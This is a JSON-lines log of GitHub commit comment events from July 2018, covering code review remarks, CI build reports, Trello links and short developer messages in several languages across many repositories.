{"id":"8020706692","type":"CommitCommentEvent","actor":{"login":"shashikolakar"},"repo":{"name":"shashikolakar/git-github"},"payload":{"comment":{"id":29839286,"position":null,"line":null,"path":null,"commit_id":"6dae923485afe0df86bddba8eaf141a7787ecc77","created_at":"2018-07-26T06:34:38Z","updated_at":"2018-07-26T06:34:38Z","author_association":"OWNER","body":"dewrwegeg"}},"created_at":"2018-07-26T06:34:38Z"}
{"id":"8020708284","type":"CommitCommentEvent","actor":{"login":"groovypark"},"repo":{"name":"joshua1988/todolist"},"payload":{"comment":{"id":29839289,"position":null,"line":null,"path":null,"commit_id":"af86ef6ed03a1a0a3e1f3679e43bad8e5059910b","created_at":"2018-07-26T06:35:07Z","updated_at":"2018-07-26T06:35:07Z","author_association":"NONE","body":"감사합니다🙏"}},"created_at":"2018-07-26T06:35:07Z"}
{"id":"8020709864","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29839293,"position":null,"line":null,"path":null,"commit_id":"2dd53b3dd3f703d0faa2768799463041a921f3e6","created_at":"2018-07-26T06:35:34Z","updated_at":"2018-07-26T06:35:34Z","author_association":"NONE","body":"我是介誠，你的 hw1 我改完了，\r\n寫的相當不錯，只有一些小問題，\r\n可以改完在 push 上來，我會在幫你看過，\r\n有不清楚或有什麼問題，都可以直接來找我！\r\n讚讚讚 :+1: "}},"created_at":"2018-07-26T06:35:34Z"}
{"id":"8020711438","type":"CommitCommentEvent","actor":{"login":"Poojithajyo"},"repo":{"name":"Poojithajyo/C-Practice"},"payload":{"comment":{"id":29839297,"position":null,"line":null,"path":null,"commit_id":"7a4580f1819f033e1b93779ec6566d5dd629af86","created_at":"2018-07-26T06:36:02Z","updated_at":"2018-07-26T06:36:02Z","author_association":"OWNER","body":"ada"}},"created_at":"2018-07-26T06:36:02Z"}
{"id":"8020712116","type":"CommitCommentEvent","actor":{"login":"mostafaberg"},"repo":{"name":"NordicSemiconductor/IOS-nRF-Mesh-Library"},"payload":{"comment":{"id":29839298,"position":null,"line":null,"path":null,"commit_id":"34d0a7a04cd20b1b9ac5147b71ef52110a6ce89f","created_at":"2018-07-26T06:36:14Z","updated_at":"2018-07-26T06:36:14Z","author_association":"COLLABORATOR","body":"What do you guys think about that PR?\r\nhttps://github.com/NordicSemiconductor/IOS-nRF-Mesh-Library/pull/44"}},"created_at":"2018-07-26T06:36:14Z"}
{"id":"8020712404","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29839300,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-26T06:36:19Z","updated_at":"2018-07-26T06:36:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T06:36:19Z"}
{"id":"8020713505","type":"CommitCommentEvent","actor":{"login":"mrbean-bremen"},"repo":{"name":"rhaxton/pydicom"},"payload":{"comment":{"id":29839301,"position":8,"line":264,"path":"pydicom/encaps.py","commit_id":"f6c21a25e8052d58bb22e9ceaf5ae982a3639a0b","created_at":"2018-07-26T06:36:38Z","updated_at":"2018-07-26T06:36:38Z","author_association":"NONE","body":"This is of course the correct fix - I wrote my comment in a bit of a rush yesterday..."}},"created_at":"2018-07-26T06:36:38Z"}
{"id":"8020719679","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29839317,"position":null,"line":null,"path":null,"commit_id":"cb33924aedbf207137010cb6d47530dead468a32","created_at":"2018-07-26T06:38:25Z","updated_at":"2018-07-26T06:38:25Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/cb33924aedbf207137010cb6d47530dead468a32#commitcomment-29838425) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/99b21465d834d229f670b71cc14537d6c9277438/daily_2018_7_26/report.md). cc @ararslan"}},"created_at":"2018-07-26T06:38:25Z"}
{"id":"8020722534","type":"CommitCommentEvent","actor":{"login":"itamar8910"},"repo":{"name":"itamar8910/CloseClothes"},"payload":{"comment":{"id":29839321,"position":null,"line":null,"path":null,"commit_id":"f6f9dff3efc9339cc22e0b1fee9e11c88416e6ee","created_at":"2018-07-26T06:39:15Z","updated_at":"2018-07-26T06:39:15Z","author_association":"OWNER","body":"looks great!"}},"created_at":"2018-07-26T06:39:15Z"}
{"id":"8020722886","type":"CommitCommentEvent","actor":{"login":"ruslanskorb"},"repo":{"name":"ruslanskorb/RSKImageCropper"},"payload":{"comment":{"id":29839324,"position":null,"line":null,"path":null,"commit_id":"824d52e250f5782b5e9445e2b849193fdc18862e","created_at":"2018-07-26T06:39:20Z","updated_at":"2018-07-26T06:39:20Z","author_association":"OWNER","body":"@xujin This method is [required](https://github.com/ruslanskorb/RSKImageCropper/blob/master/RSKImageCropper/RSKImageCropViewController.h#L326-L350). Therefore, crash in this case is the desired behavior."}},"created_at":"2018-07-26T06:39:20Z"}
{"id":"8020724124","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839326,"position":8,"line":49,"path":"app/Exceptions/Handler.php","commit_id":"2cc2595adc9314d4478af938ff8ae3e770e15714","created_at":"2018-07-26T06:39:40Z","updated_at":"2018-07-26T06:39:40Z","author_association":"OWNER","body":"Удалить лишние коментарии в коде."}},"created_at":"2018-07-26T06:39:40Z"}
{"id":"8020732577","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29839332,"position":null,"line":null,"path":null,"commit_id":"dab9694c75779261987e6e959ed19dd4de145c0f","created_at":"2018-07-26T06:42:00Z","updated_at":"2018-07-26T06:42:00Z","author_association":"NONE","body":"That have i tried before my ThreatByRank pass (failed yellow). but perhaps it was unlucky:-)\r\nhttp://tests.stockfishchess.org/tests/view/5b5848b20ebc5902bdb87b8a"}},"created_at":"2018-07-26T06:42:00Z"}
{"id":"8020738025","type":"CommitCommentEvent","actor":{"login":"biennang2016"},"repo":{"name":"biennang2016/your_first_code"},"payload":{"comment":{"id":29839343,"position":null,"line":null,"path":null,"commit_id":"ba96994a53d6354b45fe6f4547f14a2006073852","created_at":"2018-07-26T06:43:29Z","updated_at":"2018-07-26T06:43:29Z","author_association":"OWNER","body":"Change 10 to 32. Hello Holberton "}},"created_at":"2018-07-26T06:43:29Z"}
{"id":"8020738232","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839344,"position":74,"line":187,"path":"app/Http/Controllers/AdminController.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:43:33Z","updated_at":"2018-07-26T06:43:33Z","author_association":"OWNER","body":"удалить ненужный код, лишние комментарии."}},"created_at":"2018-07-26T06:43:33Z"}
{"id":"8020738615","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839345,"position":83,"line":197,"path":"app/Http/Controllers/AdminController.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:43:39Z","updated_at":"2018-07-26T06:43:39Z","author_association":"OWNER","body":"удалить ненужный код, лишние комментарии."}},"created_at":"2018-07-26T06:43:39Z"}
{"id":"8020746897","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839366,"position":151,"line":288,"path":"app/Http/Controllers/AdminController.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:45:49Z","updated_at":"2018-07-26T06:45:49Z","author_association":"OWNER","body":"удалить лишние отступы в коде"}},"created_at":"2018-07-26T06:45:49Z"}
{"id":"8020747277","type":"CommitCommentEvent","actor":{"login":"sauloperez"},"repo":{"name":"openfoodfoundation/openfoodnetwork"},"payload":{"comment":{"id":29839369,"position":4,"line":25,"path":"config/initializers/spree.rb","commit_id":"a0d2ec5666a97198ccfb3534e0d33d29f8ea6142","created_at":"2018-07-26T06:45:55Z","updated_at":"2018-07-26T06:45:55Z","author_association":"CONTRIBUTOR","body":"this and the few lines that I had to comment out 🙈 "}},"created_at":"2018-07-26T06:45:55Z"}
{"id":"8020750398","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839377,"position":161,"line":298,"path":"app/Http/Controllers/AdminController.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:46:44Z","updated_at":"2018-07-26T06:46:44Z","author_association":"OWNER","body":"удалить лишние отступы в коде"}},"created_at":"2018-07-26T06:46:44Z"}
{"id":"8020755907","type":"CommitCommentEvent","actor":{"login":"biennang2016"},"repo":{"name":"holbertonschool/your_first_code"},"payload":{"comment":{"id":29839387,"position":null,"line":null,"path":null,"commit_id":"806723c05fa0fed6c8819b178bfd16f5e1d3be8d","created_at":"2018-07-26T06:48:12Z","updated_at":"2018-07-26T06:48:12Z","author_association":"NONE","body":"Change 10 to 32. Add Hello "}},"created_at":"2018-07-26T06:48:12Z"}
{"id":"8020761368","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839395,"position":16,"line":17,"path":"resources/views/activities.blade.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:49:40Z","updated_at":"2018-07-26T06:49:40Z","author_association":"OWNER","body":"удалить лишние комментарии"}},"created_at":"2018-07-26T06:49:40Z"}
{"id":"8020767253","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839406,"position":null,"line":null,"path":null,"commit_id":"00a74c21fa16650b690f4751465a2ab54fc48e02","created_at":"2018-07-26T06:51:11Z","updated_at":"2018-07-26T06:51:11Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-26T06:51:11Z"}
{"id":"8020768714","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839409,"position":88,"line":65,"path":"resources/views/activities.blade.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:51:36Z","updated_at":"2018-07-26T06:51:36Z","author_association":"OWNER","body":"Переместить JS код в файл.\r\n"}},"created_at":"2018-07-26T06:51:36Z"}
{"id":"8020768725","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839410,"position":null,"line":null,"path":null,"commit_id":"b41c311ffc42761ff867113e31e5fb7fa7d014a5","created_at":"2018-07-26T06:51:36Z","updated_at":"2018-07-26T06:51:36Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-26T06:51:36Z"}
{"id":"8020769305","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29839411,"position":null,"line":null,"path":null,"commit_id":"c81a69cb4d68e79fdcbe839869dc9bd5f3985453","created_at":"2018-07-26T06:51:45Z","updated_at":"2018-07-26T06:51:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Rich Presence Crayons](https://trello.com/c/oWfXYRXG/1-rich-presence-crayons)"}},"created_at":"2018-07-26T06:51:45Z"}
{"id":"8020771643","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29839416,"position":null,"line":null,"path":null,"commit_id":"f94a107b55cbe497741aa06fd26fbf2f440e2419","created_at":"2018-07-26T06:52:22Z","updated_at":"2018-07-26T06:52:22Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-956](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-956).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-956-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T06:52:22Z"}
{"id":"8020774382","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29839417,"position":null,"line":null,"path":null,"commit_id":"7f83b03bc08f7b8a36f695dfe3d1fe2002a44d38","created_at":"2018-07-26T06:53:03Z","updated_at":"2018-07-26T06:53:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Help Command](https://trello.com/c/qWVFXefs/30-help-command)"}},"created_at":"2018-07-26T06:53:03Z"}
{"id":"8020774867","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29839418,"position":null,"line":null,"path":null,"commit_id":"7f83b03bc08f7b8a36f695dfe3d1fe2002a44d38","created_at":"2018-07-26T06:53:11Z","updated_at":"2018-07-26T06:53:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [More Crayons for Subs](https://trello.com/c/CbNThzZo/34-more-crayons-for-subs)"}},"created_at":"2018-07-26T06:53:11Z"}
{"id":"8020776088","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29839419,"position":null,"line":null,"path":null,"commit_id":"e3f806766590e94add3bfe25b6013f5a8d071f84","created_at":"2018-07-26T06:53:28Z","updated_at":"2018-07-26T06:53:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Scope of Commands](https://trello.com/c/Jrf3nACf/32-scope-of-commands)"}},"created_at":"2018-07-26T06:53:28Z"}
{"id":"8020776487","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29839421,"position":null,"line":null,"path":null,"commit_id":"cb82f48dbca02879c784b13d6b1e0b703c372117","created_at":"2018-07-26T06:53:34Z","updated_at":"2018-07-26T06:53:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Scope of Commands](https://trello.com/c/Jrf3nACf/32-scope-of-commands)"}},"created_at":"2018-07-26T06:53:34Z"}
{"id":"8020777227","type":"CommitCommentEvent","actor":{"login":"tdmalone"},"repo":{"name":"terraform-providers/terraform-provider-aws"},"payload":{"comment":{"id":29839422,"position":null,"line":null,"path":null,"commit_id":"3220a1a753da7c75cd44ea4eb12b8fd80efefd89","created_at":"2018-07-26T06:53:45Z","updated_at":"2018-07-26T06:53:45Z","author_association":"CONTRIBUTOR","body":"@bflad Provider version 2 upgrade has an incorrect GH link here :)"}},"created_at":"2018-07-26T06:53:45Z"}
{"id":"8020777998","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":29839424,"position":null,"line":null,"path":null,"commit_id":"26b37b3d54ac14051f41d09b8c1bddc4c585e46c","created_at":"2018-07-26T06:53:58Z","updated_at":"2018-07-26T06:53:58Z","author_association":"NONE","body":"TeamCity Chorus :: chorus-win32-2.6 Continuous [Build 2.6.525.f4679baf0844367a150668962cdcd3e8671227e6](http://build.palaso.org/viewLog.html?buildId=125674&buildTypeId=bt2) outcome was **FAILURE**\nSummary: Compilation error: src\\LibChorus\\LibChorus.csproj Build time: 00:00:49"}},"created_at":"2018-07-26T06:53:58Z"}
{"id":"8020779174","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839429,"position":56,"line":67,"path":"resources/views/orderDocs.blade.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:54:14Z","updated_at":"2018-07-26T06:54:14Z","author_association":"OWNER","body":"удалить лишние комментарии"}},"created_at":"2018-07-26T06:54:14Z"}
{"id":"8020779262","type":"CommitCommentEvent","actor":{"login":"Traesh"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29839430,"position":null,"line":null,"path":null,"commit_id":"aab605b9448a24d03287f512a5fe28adb1b54963","created_at":"2018-07-26T06:54:16Z","updated_at":"2018-07-26T06:54:16Z","author_association":"NONE","body":"When you have 208166 there is no issue, the cooldown is not applied when you cast a spell. But if you already have a cooldown when 208166 is applied, the cooldown is not automatically removed (that's why i do it manually)"}},"created_at":"2018-07-26T06:54:16Z"}
{"id":"8020782063","type":"CommitCommentEvent","actor":{"login":"bflad"},"repo":{"name":"terraform-providers/terraform-provider-aws"},"payload":{"comment":{"id":29839435,"position":null,"line":null,"path":null,"commit_id":"3220a1a753da7c75cd44ea4eb12b8fd80efefd89","created_at":"2018-07-26T06:55:01Z","updated_at":"2018-07-26T06:55:01Z","author_association":"CONTRIBUTOR","body":"It will take a few more minutes to publish the website after the release, then I will properly link it."}},"created_at":"2018-07-26T06:55:01Z"}
{"id":"8020786281","type":"CommitCommentEvent","actor":{"login":"KAMI911"},"repo":{"name":"KAMI911/osm_poi_matchmaker"},"payload":{"comment":{"id":29839441,"position":null,"line":null,"path":null,"commit_id":"9af6d17b3766a72826cf743e2d32407f9a597fbc","created_at":"2018-07-26T06:56:05Z","updated_at":"2018-07-26T06:56:05Z","author_association":"OWNER","body":"Hello,\n\nKöszi hogy szóltál, félreértettem amit írtál. Ebben az OSM fájlban nem\nraktam changesetet, mert gondoltam azt a JOSM képzi le. Nem tudom hogy\nváltozik meg az import, ha megcsinálom. Kipróbálom ezt a fájlt JOSM-ban\nhogy mit szól hozzá.\n\nÜdvözlettel / Best Regards:\n\nKálmán (KAMI) Szalai\n\n2018-07-25 20:07 GMT+02:00 ImreSamu <notifications@github.com>:\n\n> Ezeknek changset - tag-ek lesznek ?\n>\n> pl. ide kerülnek be? https://www.openstreetmap.org/\n> api/0.6/changeset/60929797\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/KAMI911/osm_poi_matchmaker/commit/9af6d17b3766a72826cf743e2d32407f9a597fbc#commitcomment-29832947>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFDA6KQmVUnlNnKKryu4MZTRA6x6hnx0ks5uKLPXgaJpZM4Vgis->\n> .\n>\n"}},"created_at":"2018-07-26T06:56:05Z"}
{"id":"8020786778","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839442,"position":137,"line":152,"path":"resources/views/orderDocs.blade.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T06:56:13Z","updated_at":"2018-07-26T06:56:13Z","author_association":"OWNER","body":"Использовать Ларавеловские методы для подключения библиотек и файлов.\r\n{{ asset('js/toaster.js')}}"}},"created_at":"2018-07-26T06:56:13Z"}
{"id":"8020794234","type":"CommitCommentEvent","actor":{"login":"kristalls"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29839456,"position":5,"line":2,"path":"lesson2/fibonacci.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-26T06:58:11Z","updated_at":"2018-07-26T06:58:11Z","author_association":"OWNER","body":"И все равно ничего у меня не выходит(\r\n"}},"created_at":"2018-07-26T06:58:11Z"}
{"id":"8020794605","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29839458,"position":null,"line":null,"path":null,"commit_id":"c81a69cb4d68e79fdcbe839869dc9bd5f3985453","created_at":"2018-07-26T06:58:17Z","updated_at":"2018-07-26T06:58:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Rich Presence Crayons](https://trello.com/c/oWfXYRXG/1-rich-presence-crayons)"}},"created_at":"2018-07-26T06:58:17Z"}
{"id":"8020797823","type":"CommitCommentEvent","actor":{"login":"bflad"},"repo":{"name":"terraform-providers/terraform-provider-aws"},"payload":{"comment":{"id":29839463,"position":null,"line":null,"path":null,"commit_id":"3220a1a753da7c75cd44ea4eb12b8fd80efefd89","created_at":"2018-07-26T06:59:07Z","updated_at":"2018-07-26T06:59:07Z","author_association":"CONTRIBUTOR","body":"Updated"}},"created_at":"2018-07-26T06:59:07Z"}
{"id":"8020800622","type":"CommitCommentEvent","actor":{"login":"oobba"},"repo":{"name":"oobba/codingoobbabody"},"payload":{"comment":{"id":29839470,"position":null,"line":null,"path":null,"commit_id":"9c12df402d1d164241116a99cb8f8d883a8b0132","created_at":"2018-07-26T06:59:50Z","updated_at":"2018-07-26T06:59:50Z","author_association":"OWNER","body":"연습중인 나의 싸이트  "}},"created_at":"2018-07-26T06:59:50Z"}
{"id":"8020803497","type":"CommitCommentEvent","actor":{"login":"imlidian"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29839481,"position":null,"line":null,"path":null,"commit_id":"e071a3f6c06f41068ad17134189a4ac3073ef76b","created_at":"2018-07-26T07:00:31Z","updated_at":"2018-07-26T07:00:31Z","author_association":"NONE","body":"20180611 爬楼来到这里 忘记留言了"}},"created_at":"2018-07-26T07:00:31Z"}
{"id":"8020805482","type":"CommitCommentEvent","actor":{"login":"ThirdUsers"},"repo":{"name":"leeqico/hushan"},"payload":{"comment":{"id":29839491,"position":null,"line":null,"path":null,"commit_id":"b4bd0e76144608e584c84a517af8b308fedf70d2","created_at":"2018-07-26T07:01:00Z","updated_at":"2018-07-26T07:01:00Z","author_association":"NONE","body":"66666666666"}},"created_at":"2018-07-26T07:01:00Z"}
{"id":"8020807594","type":"CommitCommentEvent","actor":{"login":"yoya"},"repo":{"name":"yoya/tensorflow"},"payload":{"comment":{"id":29839495,"position":null,"line":null,"path":null,"commit_id":"141fe1e7dccd97c99a60bbabfd1e8c52a7d3348a","created_at":"2018-07-26T07:01:33Z","updated_at":"2018-07-26T07:01:33Z","author_association":"OWNER","body":"I'm sorry.\r\nI intended to test with,\r\n\r\n% bazel test -c opt  tensorflow/python\r\nINFO: Build completed successfully, 5102 total actions\r\n\r\nI was not running below command line.\r\n\r\n% bazel test -c opt tensorflow/python/image_ops_test\r\nAssertionError: Tuples differ: (26, 51, 4) != (26, 51, 3)\r\n\r\nadded PR here.\r\nhttps://github.com/yoya/tensorflow/commit/141fe1e7dccd97c99a60bbabfd1e8c52a7d3348a\r\n\r\nThe added test image which became a problem was updated.\r\nI thought that lena_palette.png does not include transparency, but tRNS chunk was included.\r\nI respond it with ImageMagick +matte option.\r\n\r\n$ mogrify +matte tensorflow/core/lib/png/testdata/lena_palette.png\r\n(ImageMagick version 6.9.8-10.)\r\n\r\nThank you."}},"created_at":"2018-07-26T07:01:33Z"}
{"id":"8020809911","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29839502,"position":null,"line":null,"path":null,"commit_id":"b7ec4e1f2e0ec0141b4ef73ff95fe5f94ef29131","created_at":"2018-07-26T07:02:07Z","updated_at":"2018-07-26T07:02:07Z","author_association":"CONTRIBUTOR","body":"**Proposal** implement support for negative indexes for `at` method.\r\nExample:\r\n`at([1,2,3], -1) // returns 3`"}},"created_at":"2018-07-26T07:02:07Z"}
{"id":"8020811827","type":"CommitCommentEvent","actor":{"login":"ymmt2005"},"repo":{"name":"cybozu-go/sabakan"},"payload":{"comment":{"id":29839506,"position":4,"line":138,"path":"mtest/Makefile","commit_id":"22b5d21c31d8e9bf32d38f378214855aa29a0585","created_at":"2018-07-26T07:02:36Z","updated_at":"2018-07-26T07:02:36Z","author_association":"MEMBER","body":"go get -t -d ./... とすれば依存はまとめて解決するかな。"}},"created_at":"2018-07-26T07:02:36Z"}
{"id":"8020813426","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839520,"position":1,"line":9,"path":"ruby_basics_part_1/triangle_area.rb","commit_id":"46d1176bd91f35733eb56007229a966527a2b6ba","created_at":"2018-07-26T07:03:00Z","updated_at":"2018-07-26T07:03:00Z","author_association":"NONE","body":"когда используется to_f, или to_i - chomp можно не писать. Эти методы сами избавляются от символа новой строки"}},"created_at":"2018-07-26T07:03:00Z"}
{"id":"8020814538","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839523,"position":8,"line":14,"path":"ruby_basics_part_1/triangle_area.rb","commit_id":"46d1176bd91f35733eb56007229a966527a2b6ba","created_at":"2018-07-26T07:03:18Z","updated_at":"2018-07-26T07:03:18Z","author_association":"NONE","body":"опечатка в base"}},"created_at":"2018-07-26T07:03:18Z"}
{"id":"8020821549","type":"CommitCommentEvent","actor":{"login":"serdzik"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29839532,"position":6,"line":5,"path":"collections/choosing-projects/index.md","commit_id":"e938c861d39b1246fe1763a9f2fe706eb71720ef","created_at":"2018-07-26T07:05:03Z","updated_at":"2018-07-26T07:05:03Z","author_association":"NONE","body":"collections/choosing-projects/index.md"}},"created_at":"2018-07-26T07:05:03Z"}
{"id":"8020824751","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29839535,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-26T07:05:52Z","updated_at":"2018-07-26T07:05:52Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-26T07:05:52Z"}
{"id":"8020824777","type":"CommitCommentEvent","actor":{"login":"alikoganyan"},"repo":{"name":"alikoganyan/laravel-project-t"},"payload":{"comment":{"id":29839536,"position":35,"line":38,"path":"resources/views/resultDocs.blade.php","commit_id":"6d57bde33c7e5c2a3576b51559a29fd566eefa73","created_at":"2018-07-26T07:05:52Z","updated_at":"2018-07-26T07:05:52Z","author_association":"OWNER","body":"Обратить внимание на табуляции в коде. привести все в  порядок."}},"created_at":"2018-07-26T07:05:52Z"}
{"id":"8020830335","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29839548,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-26T07:07:17Z","updated_at":"2018-07-26T07:07:17Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T07:07:17Z"}
